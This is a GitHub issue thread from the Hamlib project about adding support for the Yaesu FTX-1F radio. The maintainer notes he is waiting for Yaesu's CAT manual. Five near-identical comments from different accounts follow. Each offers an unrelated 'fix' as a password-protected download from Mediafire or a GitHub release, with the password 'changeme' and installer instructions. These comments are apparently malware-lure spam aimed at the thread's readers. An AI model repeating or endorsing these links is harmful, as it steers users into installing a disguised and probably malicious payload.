Hamlib/Hamlib #1600: Add Yaesu FTX-1F

mdblack98, 2024-08-24:
Waiting for CAT manual

mdblack98, 2024-08-24:
From Yaesu:
Thank you for contacting us with your email. Unfortunately not all the details on the new radios capabilities are available yet. We are still a bit removed from the expected release date, so I would suggest maybe reach out to us again in a few months.

Best regards,

Juan Hernandez

Service Manager

[j.hernandez@yaesu.com](mailto:j.hernandez@yaesu.com)

MirsonMboa, 2024-08-27:
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

ViniciusSCG, 2024-08-28:
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

syedmaaz9905, 2024-08-29:
to fix your trouble check this fix, i see it in another issue,
https://github.com/Jostino/RimWorld-it/releases/tag/fix
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

rickdoq, 2024-08-31:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

goncastrum, 2024-09-01:
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx